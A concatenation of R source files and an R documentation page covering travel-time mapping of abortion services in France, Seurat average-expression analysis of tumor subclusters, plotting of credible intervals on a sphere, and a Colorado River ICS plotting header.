france_6<-readOGR(in.dir,layer="COMMUNE_6",verbose=FALSE)
### Nettoyage des bases, préparation
### Établissements ayant proposé des IVG chir. dans l'année (2013, 2014 et 2018)
### Établissements ayant réalisé des IVG tardives dans l'année 2018
ivg_geo_2013<-subset(ivg,AN==2013 & IVG-IVGME > 0)
ivg_geo_2014<-subset(ivg,AN==2014 & IVG-IVGME > 0)
ivg_geo_2018<-subset(ivg,AN==2018 & IVG-IVGME > 0)
ivg1214_geo_2018<-subset(ivg,AN==2018 & IVG1214 > 0)
## Calcul des durées de trajet
## Calculer les parcours : osrm-extract france-latest.osm.pbf -p ~/Sites/dev/osrm-backend/profiles/car.lua
## Lancer le serveur : osrm-routed france-latest.osrm
fetchDurees<-function(region) {
if(region == "Mayotte") {
print("Mayotte")
df<-data.frame(as.character(france_2$INSEE_COM),coordinates(spTransform(france_2,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9F")
ivg14_dist<-subset(ivg_geo_2014,departement=="9F")
ivg18_dist<-subset(ivg_geo_2018,departement=="9F")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9F")
}
else if(region == "Guadeloupe") {
print("Guadeloupe")
df<-data.frame(as.character(france_4$INSEE_COM),coordinates(spTransform(france_4,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9A")
ivg14_dist<-subset(ivg_geo_2014,departement=="9A")
ivg18_dist<-subset(ivg_geo_2018,departement=="9A")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9A")
}
else if(region == "Martinique") {
print("Martinique")
df<-data.frame(as.character(france_5$INSEE_COM),coordinates(spTransform(france_5,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9B")
ivg14_dist<-subset(ivg_geo_2014,departement=="9B")
ivg18_dist<-subset(ivg_geo_2018,departement=="9B")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9B")
}
else if(region == "Reunion") {
print("La Réunion")
df<-data.frame(as.character(france_3$INSEE_COM),coordinates(spTransform(france_3,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9D")
ivg14_dist<-subset(ivg_geo_2014,departement=="9D")
ivg18_dist<-subset(ivg_geo_2018,departement=="9D")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9D")
}
else if(region == "Guyane") {
print("Guyane")
df<-data.frame(as.character(france_6$INSEE_COM),coordinates(spTransform(france_6,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9C")
ivg14_dist<-subset(ivg_geo_2014,departement=="9C")
ivg18_dist<-subset(ivg_geo_2018,departement=="9C")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9C")
}
else if(region == "Metropole") {
print("Métropole")
df<-data.frame(as.character(france_1$INSEE_COM),coordinates(spTransform(france_1,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,!departement %in% c("9A","9B","9C","9D","9F"))
ivg14_dist<-subset(ivg_geo_2014,!departement %in% c("9A","9B","9C","9D","9F"))
ivg18_dist<-subset(ivg_geo_2018,!departement %in% c("9A","9B","9C","9D","9F"))
ivg1214_dist<-subset(ivg1214_geo_2018,!departement %in% c("9A","9B","9C","9D","9F"))
}
colnames(df) <- c("id", "x", "y")
iterations=nrow(df)
duree_tmp_2013<-matrix(ncol=2,nrow=iterations)
duree_tmp_2014<-matrix(ncol=2,nrow=iterations)
duree_tmp_2018<-matrix(ncol=2,nrow=iterations)
duree_tmp_1214<-matrix(ncol=2,nrow=iterations)
for(i in 1:iterations) {
# 2013
print(paste("Analysing for 2013 : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg13_dist[,c("FI","lon","lat")])
duree_tmp_2013[i,1]<-as.character(df[i,1])
duree_tmp_2013[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
# 2014
print(paste("Analysing for 2014 : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg14_dist[,c("FI","lon","lat")])
duree_tmp_2014[i,1]<-as.character(df[i,1])
duree_tmp_2014[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
# 2018
print(paste("Analysing for 2018 : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg18_dist[,c("FI","lon","lat")])
duree_tmp_2018[i,1]<-as.character(df[i,1])
duree_tmp_2018[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
# 12-14 (2018)
print(paste("Analysing for 2018 (12-14) : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg1214_dist[,c("FI","lon","lat")])
duree_tmp_1214[i,1]<-as.character(df[i,1])
duree_tmp_1214[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
}
duree_2013<-as.data.frame(duree_tmp_2013,stringsAsFactors=FALSE)
colnames(duree_2013) <- c("id", "val")
duree_2014<-as.data.frame(duree_tmp_2014,stringsAsFactors=FALSE)
colnames(duree_2014) <- c("id", "val")
duree_2018<-as.data.frame(duree_tmp_2018,stringsAsFactors=FALSE)
colnames(duree_2018) <- c("id", "val")
duree_1214<-as.data.frame(duree_tmp_1214,stringsAsFactors=FALSE)
colnames(duree_1214) <- c("id", "val")
duree<-cbind(duree_2013,duree_2014[2],duree_2018[2],duree_1214[2])
colnames(duree)<-c("code","d2013","d2014","d2018","d1214")
duree$d2013<-as.numeric(duree$d2013)
duree$d2014<-as.numeric(duree$d2014)
duree$d2018<-as.numeric(duree$d2018)
duree$d1214<-as.numeric(duree$d1214)
duree$diff<-duree$d2018-duree$d2013
duree$diff1214<-duree$d1214-duree$d2018
return(duree)
}
# France métrop.
duree_me<-fetchDurees("Metropole")
# Mayotte
duree_ma<-fetchDurees("Mayotte")
# La Réunion
duree_lr<-fetchDurees("Reunion")
# Guadeloupe
duree_ga<-fetchDurees("Guadeloupe")
# Martinique
duree_mt<-fetchDurees("Martinique")
# Guyane
duree_gy<-fetchDurees("Guyane")
duree<-rbind(duree_me,duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
#duree<-rbind(duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
## Croisement avec la population (rec. 2016 sauf Mayotte 2012)
pop2016<-read.csv("files/BTX_TD_POP1B_2016.csv",sep=";")
pop2016_ma<-read.csv("files/BTX_TD_POP1B_2012.csv",sep=";")
pop2016<-rbind.fill(pop2016,pop2016_ma)
colfap<-c("SEXE2_AGED100015","SEXE2_AGED100016","SEXE2_AGED100017","SEXE2_AGED100018","SEXE2_AGED100019","SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035","SEXE2_AGED100036","SEXE2_AGED100037","SEXE2_AGED100038","SEXE2_AGED100039","SEXE2_AGED100040","SEXE2_AGED100041","SEXE2_AGED100042","SEXE2_AGED100043","SEXE2_AGED100044","SEXE2_AGED100045","SEXE2_AGED100046","SEXE2_AGED100047","SEXE2_AGED100048","SEXE2_AGED100049","SEXE2_AGED100050")
colfap_2<-c("SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035")
pop2016$F_AP<-rowSums(pop2016[,colfap])
pop2016$F_AP2<-rowSums(pop2016[,colfap_2])
duree<-merge(duree,pop2016,by.x="code",by.y="CODGEO",all.x=TRUE)
write.csv(duree[,c("code","d2013","d2014","d2018","d1214","diff","diff1214","LIBGEO","F_AP","F_AP2")],"duree_ivg.csv",row.names=FALSE)
#duree<-read.csv("duree_ivg.csv",sep=",")
## FRANCE
tapply(duree$F_AP,cut(duree$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$d1214,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
## Loiret
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### moyenne dans le 45 ???
##### durée du trajet par commune * population par commune / population totale
sum(duree$d2018[startsWith(duree$code,"45")]*duree$F_AP[startsWith(duree$code,"45")])/sum(duree$F_AP[startsWith(duree$code,"45")])
## Loire-Atlantique
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### moyenne dans le 44 ???
##### durée du trajet par commune * population par commune / population totale
sum(duree$d2018[startsWith(duree$code,"44")]*duree$F_AP[startsWith(duree$code,"44")])/sum(duree$F_AP[startsWith(duree$code,"44")])
## Pays-de-la-Loire
sapply(c("44","49","53","72","85"),function(x){tapply(subset(duree,startsWith(duree$code,x))$F_AP,cut(subset(duree,startsWith(duree$code,x))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)})
sapply(c("44","49","53","72","85"),function(x){sum(duree$d2018[startsWith(duree$code,x)]*duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)/sum(duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)})
## Réalisation de cartes
write.csv(ivg_geo_2013,"ivg2013.csv")
write.csv(ivg_geo_2017,"ivg2017.csv")
write.csv(ivg_geo_2018,"ivg2018.csv")
coordinates(ivg_geo_2013)<- ~lon+lat
proj4string(ivg_geo_2013)<-CRS("+proj=longlat +datum=WGS84")
coordinates(ivg_geo_2018)<- ~lon+lat
proj4string(ivg_geo_2018)<-CRS("+proj=longlat +datum=WGS84")
drawRegion<-function(nom_reg,annee){
par(bg="#006994")
region<-france_1[france_1$NOM_REG==nom_reg,]
ivg_geo_2013<-spTransform(ivg_geo_2013,CRS(proj4string(france_r)))
ivg_geo_2018<-spTransform(ivg_geo_2018,CRS(proj4string(france_r)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(france_r,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
if(annee=="2013") {
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2013",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo_2013,pch=15,cex=0.5,col="red")
}
else if(annee=="2018") {
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2017",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo_2018,pch=15,cex=0.5,col="red")
}
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(poi,poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste(nom_reg,annee),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,paste('cartes/',nom_reg,'_',annee,'.pdf',sep=""))
}
drawRegionMayotte<-function(){
par(bg="#006994")
region<-france_2
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_ma,dfid="id",var="val.x",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=TRUE)
layoutLayer(title = paste("ACCÈS À L'IVG À MAYOTTE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/MAYOTTE.pdf')
}
drawRegionReunion<-function(){
par(bg="#006994")
region<-france_3
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_lr,dfid="id",var="val.x",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG À LA RÉUNION"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/REUNION.pdf')
}
drawRegionGuadeloupe<-function(){
par(bg="#006994")
region<-france_4
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="id",var="val.x",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG EN GUADELOUPE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/GUADELOUPE.pdf')
}
drawRegionMartinique<-function(){
par(bg="#006994")
region<-france_5
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="id",var="val",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG EN MARTINIQUE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/MARTINIQUE.pdf')
}
drawRegionGuyane<-function(){
par(bg="#006994")
region<-france_6
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="id",var="val",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG EN GUYANE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/GUYANE.pdf')
}
drawRegions<-function() {
drawRegionMayotte()
drawRegionReunion()
drawRegionGuadeloupe()
drawRegionMartinique()
drawRegionGuyane()
for(region in c("AUVERGNE-RHONE-ALPES","BOURGOGNE-FRANCHE-COMTE","BRETAGNE","CENTRE-VAL DE LOIRE","CORSE","GRAND EST","HAUTS-DE-FRANCE","ILE-DE-FRANCE","NORMANDIE","NOUVELLE-AQUITAINE","OCCITANIE","PAYS DE LA LOIRE","PROVENCE-ALPES-COTE D'AZUR")){
drawRegion(region,"2018")
}
}
drawRegions()
drawRegion("CENTRE-VAL DE LOIRE","2013")
drawRegion("CENTRE-VAL DE LOIRE","2017")
## Exports régionaux
extractRegion<- function(liste,nom) {
## Extraction SAE
ivg_local<-subset(ivg,departement %in% liste)
ivg_local<-ivg_local[,c("AN","rs","departement","libcategetab","IVG","IVGME","CONV","EFFPL","EFFPA","ETP","siret","nofinessej")]
colnames(ivg_local)<-c("Année","Nom","Département","Type d'établissement","Nombre d'IVG","Nombre d'IVG médicamenteuses","Conventions","Temps plein","Temps partiel","ETP moyens","Siret","Finess")
filename=paste("exports/sae_",nom,".csv",sep="")
write.csv(ivg_local,file=filename,row.names=FALSE)
## Extraction CCAM
ivg_local_ccam<-subset(ivg_ccam,departement %in% liste)
ivg_local_ccam<-ivg_local_ccam[,c("annee","rs","departement","libcategetab","ccam","nb_actes","siret","nofinessej")]
colnames(ivg_local_ccam)<-c("Année","Nom","Département","Type d'établissement","Type d'IVG","Nombre d'IVG","Siret","Finess")
filename_ccam=paste("exports/scansante_",nom,".csv",sep="")
write.csv(ivg_local_ccam,file=filename_ccam,row.names=FALSE)
print(paste(length(table(ivg_local$Nom))," établissements dans le SAE et ",length(table(ivg_local_ccam$Nom))," dans ScanSanté",sep=""))
}
|
#!/usr/bin/env Rscript
## library
packages = c(
"ggplot2",
"Seurat",
"dplyr",
"plyr",
"data.table"
)
for (pkg_name_tmp in packages) {
if (!(pkg_name_tmp %in% installed.packages()[,1])) {
print(paste0("No ", pkg_name_tmp, " Installed!"))
} else {
print(paste0("", pkg_name_tmp, " Installed!"))
}
library(package = pkg_name_tmp, character.only = T, quietly = T)
}
cat("Finish loading libraries!\n")
cat("###########################################\n")
## get the path to the seurat object
args = commandArgs(trailingOnly=TRUE)
## argument: directory to the output
path_output_dir <- args[1]
cat(paste0("Path to the output directory: ", path_output_dir, "\n"))
cat("###########################################\n")
## argument 2: filename for the output file
path_output_filename <- args[2]
cat(paste0("Filename for the output: ", path_output_filename, "\n"))
cat("###########################################\n")
path_output <- paste0(path_output_dir, path_output_filename)
## argument : path to seurat object
path_srat <- args[3]
cat(paste0("Path to the seurat object: ", path_srat, "\n"))
cat("###########################################\n")
## argument: path to the barcode-to-tumorsubcluster table
path_barcode2tumorsubcluster_df <- args[4]
cat(paste0("Path to the barcode-to-tumorsubcluster table: ", path_barcode2tumorsubcluster_df, "\n"))
cat("###########################################\n")
## input the barcode-to-tumorsubcluster table
barcode2tumorsubcluster_df <- fread(input = path_barcode2tumorsubcluster_df, data.table = F)
barcode2tumorsubcluster_df <- as.data.frame(barcode2tumorsubcluster_df)
cat("finish reading the barcode-to-tumorsubcluster table!\n")
cat("###########################################\n")
## input srat
cat(paste0("Start reading the seurat object: ", "\n"))
srat <- readRDS(path_srat)
print("Finish reading the seurat object!\n")
cat("###########################################\n")
## add info to the meta data
metadata_tmp <- barcode2tumorsubcluster_df
metadata_tmp$tumor_exp_subcluster.name <- paste0(metadata_tmp$orig.ident, "_EC", metadata_tmp$tumor_exp_subcluster.ident)
rownames(metadata_tmp) <- metadata_tmp$integrated_barcode
srat@meta.data <- metadata_tmp
## change identification for the cells to be aliquot id
Idents(srat) <- "tumor_exp_subcluster.name"
## run average expression
aliquot.averages <- AverageExpression(srat)
print("Finish running AverageExpression!\n")
cat("###########################################\n")
## write output
write.table(aliquot.averages, file = path_output, quote = F, sep = "\t", row.names = T)
cat("Finished saving the output\n")
cat("###########################################\n")
| /integration/30_aliquot_integration/averageexpression/averageexpression_tumor_cells_by_seurat_subcluster.R | no_license | ding-lab/ccRCC_snRNA_analysis | R | false | false | 2,698 | r | #!/usr/bin/env Rscript
## library
packages = c(
"ggplot2",
"Seurat",
"dplyr",
"plyr",
"data.table"
)
for (pkg_name_tmp in packages) {
if (!(pkg_name_tmp %in% installed.packages()[,1])) {
print(paste0("No ", pkg_name_tmp, " Installed!"))
} else {
print(paste0("", pkg_name_tmp, " Installed!"))
}
library(package = pkg_name_tmp, character.only = T, quietly = T)
}
cat("Finish loading libraries!\n")
cat("###########################################\n")
## get the path to the seurat object
args = commandArgs(trailingOnly=TRUE)
## argument: directory to the output
path_output_dir <- args[1]
cat(paste0("Path to the output directory: ", path_output_dir, "\n"))
cat("###########################################\n")
## argument 2: filename for the output file
path_output_filename <- args[2]
cat(paste0("Filename for the output: ", path_output_filename, "\n"))
cat("###########################################\n")
path_output <- paste0(path_output_dir, path_output_filename)
## argument : path to seurat object
path_srat <- args[3]
cat(paste0("Path to the seurat object: ", path_srat, "\n"))
cat("###########################################\n")
## argument: path to the barcode-to-tumorsubcluster table
path_barcode2tumorsubcluster_df <- args[4]
cat(paste0("Path to the barcode-to-tumorsubcluster table: ", path_barcode2tumorsubcluster_df, "\n"))
cat("###########################################\n")
## input the barcode-to-tumorsubcluster table
barcode2tumorsubcluster_df <- fread(input = path_barcode2tumorsubcluster_df, data.table = F)
barcode2tumorsubcluster_df <- as.data.frame(barcode2tumorsubcluster_df)
cat("finish reading the barcode-to-tumorsubcluster table!\n")
cat("###########################################\n")
## input srat
cat(paste0("Start reading the seurat object: ", "\n"))
srat <- readRDS(path_srat)
print("Finish reading the seurat object!\n")
cat("###########################################\n")
## add info to the meta data
metadata_tmp <- barcode2tumorsubcluster_df
metadata_tmp$tumor_exp_subcluster.name <- paste0(metadata_tmp$orig.ident, "_EC", metadata_tmp$tumor_exp_subcluster.ident)
rownames(metadata_tmp) <- metadata_tmp$integrated_barcode
srat@meta.data <- metadata_tmp
## change identification for the cells to be aliquot id
Idents(srat) <- "tumor_exp_subcluster.name"
## run average expression
aliquot.averages <- AverageExpression(srat)
print("Finish running AverageExpression!\n")
cat("###########################################\n")
## write output
write.table(aliquot.averages, file = path_output, quote = F, sep = "\t", row.names = T)
cat("Finished saving the output\n")
cat("###########################################\n")
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plot.CImapSphere.R
\name{plot.CImapSphere}
\alias{plot.CImapSphere}
\title{Plotting of simultaneous credible intervals on a sphere.}
\usage{
\method{plot}{CImapSphere}(x, lon, lat, color = c("firebrick1",
"gainsboro", "dodgerblue3"), turnOut = FALSE, title, ...)
}
\arguments{
\item{x}{List containing the simultaneous credible intervals of all
differences of smooths.}
\item{lon}{Vector containing the longitudes of the data points.}
\item{lat}{Vector containing the latitudes of the data points.}
\item{color}{Vector of length 3 containing the colors to be used in the
credibility maps. The first color represents the credibly negative pixels,
the second color the pixels that are not credibly different from zero
and the third color the credibly positive pixels.}
\item{turnOut}{Logical. Should the output images be turned 90 degrees
counter-clockwise?}
\item{title}{Vector containing one string per plot. The required
number of titles is equal to \code{length(mrbOut$ciout)}. If no \code{title}
is passed, defaults are used.}
\item{...}{Further graphical parameters can be passed.}
}
\value{
Plots of simultaneous credible intervals for all differences of
smooths are created.
}
\description{
Maps with simultaneous credible intervals for all differences of smooths
at neighboring scales \eqn{z_{i}} are plotted. Continental lines are added.
}
\details{
The default colors of the maps have the following meaning:
\itemize{
\item \strong{Blue}: Credibly positive pixels.
\item \strong{Red}: Credibly negative pixels.
\item \strong{Grey}: Pixels that are not credibly different from zero.
}
\code{x} corresponds to the \code{ciout}-part of the
output of \code{\link{mrbsizeRsphere}}.
}
\examples{
# Artificial spherical sample data
set.seed(987)
sampleData <- matrix(stats::rnorm(2000), nrow = 200)
sampleData[50:65, ] <- sampleData[50:65, ] + 5
lon <- seq(-180, 180, length.out = 20)
lat <- seq(-90, 90, length.out = 10)
# mrbsizeRsphere analysis
mrbOut <- mrbsizeRsphere(posteriorFile = sampleData, mm = 20, nn = 10,
lambdaSmoother = c(0.1, 1), prob = 0.95)
# Posterior mean of the differences of smooths
plot(x = mrbOut$smMean, lon = lon, lat = lat,
color = fields::tim.colors())
# Credibility analysis using simultaneous credible intervals
plot(x = mrbOut$ciout, lon = lon, lat = lat)
}
| /man/plot.CImapSphere.Rd | no_license | romanflury/mrbsizeR | R | false | true | 2,455 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plot.CImapSphere.R
\name{plot.CImapSphere}
\alias{plot.CImapSphere}
\title{Plotting of simultaneous credible intervals on a sphere.}
\usage{
\method{plot}{CImapSphere}(x, lon, lat, color = c("firebrick1",
"gainsboro", "dodgerblue3"), turnOut = FALSE, title, ...)
}
\arguments{
\item{x}{List containing the simultaneous credible intervals of all
differences of smooths.}
\item{lon}{Vector containing the longitudes of the data points.}
\item{lat}{Vector containing the latitudes of the data points.}
\item{color}{Vector of length 3 containing the colors to be used in the
credibility maps. The first color represents the credibly negative pixels,
the second color the pixels that are not credibly different from zero
and the third color the credibly positive pixels.}
\item{turnOut}{Logical. Should the output images be turned 90 degrees
counter-clockwise?}
\item{title}{Vector containing one string per plot. The required
number of titles is equal to \code{length(mrbOut$ciout)}. If no \code{title}
is passed, defaults are used.}
\item{...}{Further graphical parameters can be passed.}
}
\value{
Plots of simultaneous credible intervals for all differences of
smooths are created.
}
\description{
Maps with simultaneous credible intervals for all differences of smooths
at neighboring scales \eqn{z_{i}} are plotted. Continental lines are added.
}
\details{
The default colors of the maps have the following meaning:
\itemize{
\item \strong{Blue}: Credibly positive pixels.
\item \strong{Red}: Credibly negative pixels.
\item \strong{Grey}: Pixels that are not credibly different from zero.
}
\code{x} corresponds to the \code{ciout}-part of the
output of \code{\link{mrbsizeRsphere}}.
}
\examples{
# Artificial spherical sample data
set.seed(987)
sampleData <- matrix(stats::rnorm(2000), nrow = 200)
sampleData[50:65, ] <- sampleData[50:65, ] + 5
lon <- seq(-180, 180, length.out = 20)
lat <- seq(-90, 90, length.out = 10)
# mrbsizeRsphere analysis
mrbOut <- mrbsizeRsphere(posteriorFile = sampleData, mm = 20, nn = 10,
lambdaSmoother = c(0.1, 1), prob = 0.95)
# Posterior mean of the differences of smooths
plot(x = mrbOut$smMean, lon = lon, lat = lat,
color = fields::tim.colors())
# Credibility analysis using simultaneous credible intervals
plot(x = mrbOut$ciout, lon = lon, lat = lat)
}
|
# ICS-Plots.r
#
# Make stacked bar graph of state Intentionally Created Surplus holdings by year
#
# Data is USBR Water Accounting Reports: https://www.usbr.gov/lc/region/g4000/wtracct.html in source Excel file
# Please report bugs/feedback to:
#
# Updated June 23, 2020 to include annual deposits and withdraws as year-to-year differnces
#
# Updated April 4, 2021 to look at ICS to DCP conversion
